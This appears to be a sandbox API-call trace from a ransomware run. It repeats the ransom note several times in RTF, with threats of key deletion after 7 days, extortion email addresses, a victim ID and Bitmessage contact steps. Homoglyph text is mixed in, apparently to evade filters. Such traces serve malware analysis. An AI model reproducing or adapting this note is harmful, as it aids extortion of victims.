10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0298.451] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0298.451] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x24866c8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 